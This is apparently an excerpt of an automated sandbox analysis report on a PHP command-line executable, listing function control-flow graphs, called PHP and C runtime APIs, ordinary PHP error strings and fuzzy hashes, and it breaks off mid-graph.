7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 662->669 663->664 667 7ff7498c2334-7ff7498c2337 663->667 664->665 670 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 665->670 671 7ff7498c23a8-7ff7498c23ad 665->671 666->662 675 7ff7498c2339-7ff7498c2340 667->675 676 7ff7498c235d-7ff7498c236a 667->676 677 7ff7498c242f-7ff7498c2436 668->677 678 7ff7498c2427-7ff7498c2429 php_request_shutdown 668->678 669->668 670->671 673 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 671->673 674 7ff7498c23e6-7ff7498c23ea 671->674 693 7ff7498c24c2 673->693 681 7ff7498c24c6-7ff7498c24c9 674->681 675->676 682 7ff7498c2342-7ff7498c234f 675->682 676->665 683 7ff7498c2441-7ff7498c2446 677->683 684 7ff7498c2438-7ff7498c243b free 677->684 678->677 688 7ff7498c2506-7ff7498c2509 681->688 689 7ff7498c24cb-7ff7498c24ce 681->689 682->664 690 7ff7498c2351-7ff7498c2355 682->690 685 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 683->685 686 7ff7498c244c-7ff7498c2455 _getpid 683->686 684->683 686->685 691 7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 686->691 695 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 688->695 697 7ff7498c2588-7ff7498c259a 688->697 694 7ff7498c24d0-7ff7498c24d7 689->694 689->695 690->664 696 7ff7498c2357-7ff7498c235b 690->696 691->693 693->681 694->688 702 7ff7498c24d9-7ff7498c24e6 694->702 703 7ff7498c2526-7ff7498c2536 php_printf 695->703 704 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 695->704 696->664 696->676 699 7ff7498c25c5-7ff7498c264f php_request_startup 697->699 700 7ff7498c259c-7ff7498c259f 697->700 709 7ff7498c2651-7ff7498c2664 php_output_write 699->709 710 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 699->710 700->699 708 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 700->708 711 7ff7498c24f4-7ff7498c2502 702->711 712 7ff7498c24e8-7ff7498c24ec 702->712 713 7ff7498c266a 703->713 705 7ff7498c2564-7ff7498c2574 _strdup 704->705 706 7ff7498c2578-7ff7498c2586 704->706 705->706 714 7ff7498c25c1 706->714 708->714 709->713 716 7ff7498c273b-7ff7498c2773 zend_is_auto_global 710->716 717 7ff7498c26fb-7ff7498c26ff 710->717 711->688 712->711 715 7ff7498c24ee-7ff7498c24f2 712->715 713->666 714->699 715->688 715->711 718 7ff7498c23ef-7ff7498c2406 716->718 719 7ff7498c2779-7ff7498c2789 716->719 717->716 720 7ff7498c2701-7ff7498c2709 717->720 718->662 719->685 722 7ff7498c2710-7ff7498c271a 720->722 723 7ff7498c2720-7ff7498c2728 722->723 723->723 724 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 723->724 724->716 724->722
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Either execute direct code, process stdin or use a file.$Finished execution, repeating...$Interactive shell (-a) requires the readline extension.
                                                • API String ID: 3553338152-3238503953
                                                • Opcode ID: 28e6316da42a0790e21ea5dbf0cbe5be1a67c08731897a8fb45388f4794f0680
                                                • Instruction ID: e6803d3d513de957184ad0677e50be847c939fb2d81e69fe6800580d09b3beaf
                                                • Opcode Fuzzy Hash: 28e6316da42a0790e21ea5dbf0cbe5be1a67c08731897a8fb45388f4794f0680
                                                • Instruction Fuzzy Hash: 31610722A0CB42C6EB50BF29E444269F7B8FB44B94F944536DA4E437A8CF3CE464D720
                                                Function 00007FF7498C200B Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 127COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 727 7ff7498c200b-7ff7498c2012 728 7ff7498c2018-7ff7498c201b 727->728 729 7ff7498c2167-7ff7498c2173 727->729 730 7ff7498c201d-7ff7498c2029 728->730 731 7ff7498c1ffc-7ff7498c2006 728->731 732 7ff7498c2275-7ff7498c22b6 php_getopt 729->732 730->729 730->732 731->732 733 7ff7498c20a7-7ff7498c20b3 731->733 734 7ff7498c1d80-7ff7498c1d86 732->734 735 7ff7498c22bc-7ff7498c22de 732->735 733->732 734->732 736 7ff7498c1d8c-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 734->736 738 7ff7498c22e0 735->738 739 7ff7498c231c-7ff7498c231f 735->739 745 7ff7498c240e-7ff7498c2413 736->745 740 7ff7498c22e7-7ff7498c22ee 738->740 742 7ff7498c2321-7ff7498c232d php_win32_console_is_own 739->742 743 7ff7498c237b 739->743 740->740 744 7ff7498c22f0-7ff7498c2317 php_output_write 740->744 746 7ff7498c232f-7ff7498c2332 742->746 747 7ff7498c236c-7ff7498c2379 742->747 748 7ff7498c237f-7ff7498c2382 743->748 749 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 744->749 751 7ff7498c241f-7ff7498c2425 745->751 752 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 745->752 746->747 750 7ff7498c2334-7ff7498c2337 746->750 747->748 753 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 748->753 754 7ff7498c23a8-7ff7498c23ad 748->754 749->745 758 7ff7498c2339-7ff7498c2340 750->758 759 7ff7498c235d-7ff7498c236a 750->759 760 7ff7498c242f-7ff7498c2436 751->760 761 7ff7498c2427-7ff7498c2429 php_request_shutdown 751->761 752->751 753->754 756 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 754->756 757 7ff7498c23e6-7ff7498c23ea 754->757 776 7ff7498c24c2 756->776 764 7ff7498c24c6-7ff7498c24c9 757->764 758->759 765 7ff7498c2342-7ff7498c234f 758->765 759->748 766 7ff7498c2441-7ff7498c2446 760->766 767 7ff7498c2438-7ff7498c243b free 760->767 761->760 771 7ff7498c2506-7ff7498c2509 764->771 772 7ff7498c24cb-7ff7498c24ce 764->772 765->747 773 7ff7498c2351-7ff7498c2355 765->773 768 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 766->768 769 7ff7498c244c-7ff7498c2455 _getpid 766->769 767->766 769->768 774 7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 769->774 778 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 771->778 780 7ff7498c2588-7ff7498c259a 771->780 777 7ff7498c24d0-7ff7498c24d7 772->777 772->778 773->747 779 7ff7498c2357-7ff7498c235b 773->779 774->776 776->764 777->771 785 7ff7498c24d9-7ff7498c24e6 777->785 786 7ff7498c2526-7ff7498c2536 php_printf 778->786 787 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 778->787 779->747 779->759 782 7ff7498c25c5-7ff7498c264f php_request_startup 780->782 783 7ff7498c259c-7ff7498c259f 780->783 792 7ff7498c2651-7ff7498c2664 php_output_write 782->792 793 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 782->793 783->782 791 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 783->791 794 7ff7498c24f4-7ff7498c2502 785->794 795 7ff7498c24e8-7ff7498c24ec 785->795 796 7ff7498c266a 786->796 788 7ff7498c2564-7ff7498c2574 _strdup 787->788 789 7ff7498c2578-7ff7498c2586 787->789 788->789 797 7ff7498c25c1 789->797 791->797 792->796 799 7ff7498c273b-7ff7498c2773 zend_is_auto_global 793->799 800 7ff7498c26fb-7ff7498c26ff 793->800 794->771 795->794 798 7ff7498c24ee-7ff7498c24f2 795->798 796->749 797->782 798->771 798->794 801 7ff7498c23ef-7ff7498c2406 799->801 802 7ff7498c2779-7ff7498c2789 799->802 800->799 803 7ff7498c2701-7ff7498c2709 800->803 801->745 802->768 805 7ff7498c2710-7ff7498c271a 803->805 806 7ff7498c2720-7ff7498c2728 805->806 806->806 807 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 806->807 807->799 807->805
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Either execute direct code, process stdin or use a file.$Finished execution, repeating...$You can use -f only once.
                                                • API String ID: 3553338152-1843009292
                                                • Opcode ID: cbc51a399cb6b393726d7776a74812c159b3f4b5d0ceff1dc37e7af6ccd1ed26
                                                • Instruction ID: 8b68a6810817ab84b443c4c14397d7c86803a3c55879216696a2b40315588e52
                                                • Opcode Fuzzy Hash: cbc51a399cb6b393726d7776a74812c159b3f4b5d0ceff1dc37e7af6ccd1ed26
                                                • Instruction Fuzzy Hash: 9561E432A0CB46C6EB54BF29E444269B7B8FB44B94F944536DA4E437A8CF3CE464D720
                                                Function 00007FF7498C21A2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 122COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 810 7ff7498c21a2-7ff7498c21a9 811 7ff7498c21bb-7ff7498c21c7 810->811 812 7ff7498c21ab-7ff7498c21b6 810->812 813 7ff7498c2275-7ff7498c22b6 php_getopt 811->813 812->813 814 7ff7498c1d80-7ff7498c1d86 813->814 815 7ff7498c22bc-7ff7498c22de 813->815 814->813 816 7ff7498c1d8c-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 814->816 818 7ff7498c22e0 815->818 819 7ff7498c231c-7ff7498c231f 815->819 825 7ff7498c240e-7ff7498c2413 816->825 820 7ff7498c22e7-7ff7498c22ee 818->820 822 7ff7498c2321-7ff7498c232d php_win32_console_is_own 819->822 823 7ff7498c237b 819->823 820->820 824 7ff7498c22f0-7ff7498c2317 php_output_write 820->824 826 7ff7498c232f-7ff7498c2332 822->826 827 7ff7498c236c-7ff7498c2379 822->827 828 7ff7498c237f-7ff7498c2382 823->828 829 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 824->829 831 7ff7498c241f-7ff7498c2425 825->831 832 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 825->832 826->827 830 7ff7498c2334-7ff7498c2337 826->830 827->828 833 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 828->833 834 7ff7498c23a8-7ff7498c23ad 828->834 829->825 838 7ff7498c2339-7ff7498c2340 830->838 839 7ff7498c235d-7ff7498c236a 830->839 840 7ff7498c242f-7ff7498c2436 831->840 841 7ff7498c2427-7ff7498c2429 php_request_shutdown 831->841 832->831 833->834 836 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 834->836 837 7ff7498c23e6-7ff7498c23ea 834->837 856 7ff7498c24c2 836->856 844 7ff7498c24c6-7ff7498c24c9 837->844 838->839 845 7ff7498c2342-7ff7498c234f 838->845 839->828 846 7ff7498c2441-7ff7498c2446 840->846 847 7ff7498c2438-7ff7498c243b free 840->847 841->840 851 7ff7498c2506-7ff7498c2509 844->851 852 7ff7498c24cb-7ff7498c24ce 844->852 845->827 853 7ff7498c2351-7ff7498c2355 845->853 848 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 846->848 849 7ff7498c244c-7ff7498c2455 _getpid 846->849 847->846 849->848 854 7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 849->854 858 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 851->858 860 7ff7498c2588-7ff7498c259a 851->860 857 7ff7498c24d0-7ff7498c24d7 852->857 852->858 853->827 859 7ff7498c2357-7ff7498c235b 853->859 854->856 856->844 857->851 865 7ff7498c24d9-7ff7498c24e6 857->865 866 7ff7498c2526-7ff7498c2536 php_printf 858->866 867 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 858->867 859->827 859->839 862 7ff7498c25c5-7ff7498c264f php_request_startup 860->862 863 7ff7498c259c-7ff7498c259f 860->863 872 7ff7498c2651-7ff7498c2664 php_output_write 862->872 873 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 862->873 863->862 871 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 863->871 874 7ff7498c24f4-7ff7498c2502 865->874 875 7ff7498c24e8-7ff7498c24ec 865->875 876 7ff7498c266a 866->876 868 7ff7498c2564-7ff7498c2574 _strdup 867->868 869 7ff7498c2578-7ff7498c2586 867->869 868->869 877 7ff7498c25c1 869->877 871->877 872->876 879 7ff7498c273b-7ff7498c2773 zend_is_auto_global 873->879 880 7ff7498c26fb-7ff7498c26ff 873->880 874->851 875->874 878 7ff7498c24ee-7ff7498c24f2 875->878 876->829 877->862 878->851 878->874 881 7ff7498c23ef-7ff7498c2406 879->881 882 7ff7498c2779-7ff7498c2789 879->882 880->879 883 7ff7498c2701-7ff7498c2709 880->883 881->825 882->848 885 7ff7498c2710-7ff7498c271a 883->885 886 7ff7498c2720-7ff7498c2728 885->886 886->886 887 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 886->887 887->879 887->885
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Finished execution, repeating...$Source stripping only works for files.
                                                • API String ID: 3553338152-1395239938
                                                • Opcode ID: 65d906f40d2b1cad87c91d3b0134104b547da77fcb2dcbbec68ff2cde24d55b6
                                                • Instruction ID: 9676f80feb2ebf762fa7ed9955d9988335e59bb6eac3bb9d3156f7eda9f898df
                                                • Opcode Fuzzy Hash: 65d906f40d2b1cad87c91d3b0134104b547da77fcb2dcbbec68ff2cde24d55b6
                                                • Instruction Fuzzy Hash: C5510832A0CB42C6EB54BF29E444269B7B8FB44B94F944536DA4E437A8CF3CE464D720
                                                Function 00007FF7498C2266 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 116COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 968 7ff7498c2266-7ff7498c2271 atoi 969 7ff7498c2275-7ff7498c22b6 php_getopt 968->969 970 7ff7498c1d80-7ff7498c1d86 969->970 971 7ff7498c22bc-7ff7498c22de 969->971 970->969 972 7ff7498c1d8c-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 970->972 974 7ff7498c22e0 971->974 975 7ff7498c231c-7ff7498c231f 971->975 981 7ff7498c240e-7ff7498c2413 972->981 976 7ff7498c22e7-7ff7498c22ee 974->976 978 7ff7498c2321-7ff7498c232d php_win32_console_is_own 975->978 979 7ff7498c237b 975->979 976->976 980 7ff7498c22f0-7ff7498c2317 php_output_write 976->980 982 7ff7498c232f-7ff7498c2332 978->982 983 7ff7498c236c-7ff7498c2379 978->983 984 7ff7498c237f-7ff7498c2382 979->984 985 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 980->985 987 7ff7498c241f-7ff7498c2425 981->987 988 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 981->988 982->983 986 7ff7498c2334-7ff7498c2337 982->986 983->984 989 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 984->989 990 7ff7498c23a8-7ff7498c23ad 984->990 985->981 994 7ff7498c2339-7ff7498c2340 986->994 995 7ff7498c235d-7ff7498c236a 986->995 996 7ff7498c242f-7ff7498c2436 987->996 997 7ff7498c2427-7ff7498c2429 php_request_shutdown 987->997 988->987 989->990 992 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 990->992 993 7ff7498c23e6-7ff7498c23ea 990->993 1012 7ff7498c24c2 992->1012 1000 7ff7498c24c6-7ff7498c24c9 993->1000 994->995 1001 7ff7498c2342-7ff7498c234f 994->1001 995->984 1002 7ff7498c2441-7ff7498c2446 996->1002 1003 7ff7498c2438-7ff7498c243b free 996->1003 997->996 1007 7ff7498c2506-7ff7498c2509 1000->1007 1008 7ff7498c24cb-7ff7498c24ce 1000->1008 1001->983 1009 7ff7498c2351-7ff7498c2355 1001->1009 1004 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 1002->1004 1005 7ff7498c244c-7ff7498c2455 _getpid 1002->1005 1003->1002 1005->1004 1010 7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 1005->1010 1014 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 1007->1014 1016 7ff7498c2588-7ff7498c259a 1007->1016 1013 7ff7498c24d0-7ff7498c24d7 1008->1013 1008->1014 1009->983 1015 7ff7498c2357-7ff7498c235b 1009->1015 1010->1012 1012->1000 1013->1007 1021 7ff7498c24d9-7ff7498c24e6 1013->1021 1022 7ff7498c2526-7ff7498c2536 php_printf 1014->1022 1023 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 1014->1023 1015->983 1015->995 1018 7ff7498c25c5-7ff7498c264f php_request_startup 1016->1018 1019 7ff7498c259c-7ff7498c259f 1016->1019 1028 7ff7498c2651-7ff7498c2664 php_output_write 1018->1028 1029 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 1018->1029 1019->1018 1027 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 1019->1027 1030 7ff7498c24f4-7ff7498c2502 1021->1030 1031 7ff7498c24e8-7ff7498c24ec 1021->1031 1032 7ff7498c266a 1022->1032 1024 7ff7498c2564-7ff7498c2574 _strdup 1023->1024 1025 7ff7498c2578-7ff7498c2586 1023->1025 1024->1025 1033 7ff7498c25c1 1025->1033 1027->1033 1028->1032 1035 7ff7498c273b-7ff7498c2773 zend_is_auto_global 1029->1035 1036 7ff7498c26fb-7ff7498c26ff 1029->1036 1030->1007 1031->1030 1034 7ff7498c24ee-7ff7498c24f2 1031->1034 1032->985 1033->1018 1034->1007 1034->1030 1037 7ff7498c23ef-7ff7498c2406 1035->1037 1038 7ff7498c2779-7ff7498c2789 1035->1038 1036->1035 1039 7ff7498c2701-7ff7498c2709 1036->1039 1037->981 1038->1004 1041 7ff7498c2710-7ff7498c271a 1039->1041 1042 7ff7498c2720-7ff7498c2728 1041->1042 1042->1042 1043 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 1042->1043 1043->1035 1043->1041
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$atoifprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 2657596451-4259897058
                                                • Opcode ID: bdb06fa591e3e54191485d2cc3e0097ef2c008e19f655db3b2957de89980eeea
                                                • Instruction ID: ec68daef639decbf695e16e5aca15eb70bebc9a92464f1602c561455d9a9132e
                                                • Opcode Fuzzy Hash: bdb06fa591e3e54191485d2cc3e0097ef2c008e19f655db3b2957de89980eeea
                                                • Instruction Fuzzy Hash: A051F732A0CB42C6EB54BF69E844269B7B8FB44B94F944136DA4E437A8DF3CE454D720
                                                Function 00007FF7498C21CC Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 116COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 890 7ff7498c21cc-7ff7498c21d7 zend_load_extension 891 7ff7498c2275-7ff7498c22b6 php_getopt 890->891 892 7ff7498c1d80-7ff7498c1d86 891->892 893 7ff7498c22bc-7ff7498c22de 891->893 892->891 894 7ff7498c1d8c-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 892->894 896 7ff7498c22e0 893->896 897 7ff7498c231c-7ff7498c231f 893->897 903 7ff7498c240e-7ff7498c2413 894->903 898 7ff7498c22e7-7ff7498c22ee 896->898 900 7ff7498c2321-7ff7498c232d php_win32_console_is_own 897->900 901 7ff7498c237b 897->901 898->898 902 7ff7498c22f0-7ff7498c2317 php_output_write 898->902 904 7ff7498c232f-7ff7498c2332 900->904 905 7ff7498c236c-7ff7498c2379 900->905 906 7ff7498c237f-7ff7498c2382 901->906 907 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 902->907 909 7ff7498c241f-7ff7498c2425 903->909 910 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 903->910 904->905 908 7ff7498c2334-7ff7498c2337 904->908 905->906 911 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 906->911 912 7ff7498c23a8-7ff7498c23ad 906->912 907->903 916 7ff7498c2339-7ff7498c2340 908->916 917 7ff7498c235d-7ff7498c236a 908->917 918 7ff7498c242f-7ff7498c2436 909->918 919 7ff7498c2427-7ff7498c2429 php_request_shutdown 909->919 910->909 911->912 914 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 912->914 915 7ff7498c23e6-7ff7498c23ea 912->915 934 7ff7498c24c2 914->934 922 7ff7498c24c6-7ff7498c24c9 915->922 916->917 923 7ff7498c2342-7ff7498c234f 916->923 917->906 924 7ff7498c2441-7ff7498c2446 918->924 925 7ff7498c2438-7ff7498c243b free 918->925 919->918 929 7ff7498c2506-7ff7498c2509 922->929 930 7ff7498c24cb-7ff7498c24ce 922->930 923->905 931 7ff7498c2351-7ff7498c2355 923->931 926 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 924->926 927 7ff7498c244c-7ff7498c2455 _getpid 924->927 925->924 927->926 932 7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 927->932 936 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 929->936 938 7ff7498c2588-7ff7498c259a 929->938 935 7ff7498c24d0-7ff7498c24d7 930->935 930->936 931->905 937 7ff7498c2357-7ff7498c235b 931->937 932->934 934->922 935->929 943 7ff7498c24d9-7ff7498c24e6 935->943 944 7ff7498c2526-7ff7498c2536 php_printf 936->944 945 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 936->945 937->905 937->917 940 7ff7498c25c5-7ff7498c264f php_request_startup 938->940 941 7ff7498c259c-7ff7498c259f 938->941 950 7ff7498c2651-7ff7498c2664 php_output_write 940->950 951 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 940->951 941->940 949 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 941->949 952 7ff7498c24f4-7ff7498c2502 943->952 953 7ff7498c24e8-7ff7498c24ec 943->953 954 7ff7498c266a 944->954 946 7ff7498c2564-7ff7498c2574 _strdup 945->946 947 7ff7498c2578-7ff7498c2586 945->947 946->947 955 7ff7498c25c1 947->955 949->955 950->954 957 7ff7498c273b-7ff7498c2773 zend_is_auto_global 951->957 958 7ff7498c26fb-7ff7498c26ff 951->958 952->929 953->952 956 7ff7498c24ee-7ff7498c24f2 953->956 954->907 955->940 956->929 956->952 959 7ff7498c23ef-7ff7498c2406 957->959 960 7ff7498c2779-7ff7498c2789 957->960 958->957 961 7ff7498c2701-7ff7498c2709 958->961 959->903 960->926 963 7ff7498c2710-7ff7498c271a 961->963 964 7ff7498c2720-7ff7498c2728 963->964 964->964 965 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 964->965 965->957 965->963
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$fprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_load_extensionzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 2028098766-4259897058
                                                • Opcode ID: 1b3d15ab18ccb837026a14a309577c3a8c289e649f75982ed04d78b132899a24
                                                • Instruction ID: adfc194bd557edf5005977c23afecf2c61f084078c7af9e8847328cb2cdc9860
                                                • Opcode Fuzzy Hash: 1b3d15ab18ccb837026a14a309577c3a8c289e649f75982ed04d78b132899a24
                                                • Instruction Fuzzy Hash: 80510932A0CB42C6EB54BF69E444269B7B8FB44B94F944135DA4E437A8CF3CE464D720
                                                Function 00007FF7498C27B0 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 93COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1046 7ff7498c27b0-7ff7498c27c1 open_file_for_scanning 1047 7ff7498c27c7-7ff7498c27e1 php_get_highlight_struct zend_highlight 1046->1047 1048 7ff7498c240e-7ff7498c2413 1046->1048 1047->1048 1049 7ff7498c241f-7ff7498c2425 1048->1049 1050 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 1048->1050 1051 7ff7498c242f-7ff7498c2436 1049->1051 1052 7ff7498c2427-7ff7498c2429 php_request_shutdown 1049->1052 1050->1049 1053 7ff7498c2441-7ff7498c2446 1051->1053 1054 7ff7498c2438-7ff7498c243b free 1051->1054 1052->1051 1055 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 1053->1055 1056 7ff7498c244c-7ff7498c2455 _getpid 1053->1056 1054->1053 1056->1055 1057 7ff7498c245b-7ff7498c24c9 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 1056->1057 1064 7ff7498c2506-7ff7498c2509 1057->1064 1065 7ff7498c24cb-7ff7498c24ce 1057->1065 1067 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 1064->1067 1068 7ff7498c2588-7ff7498c259a 1064->1068 1066 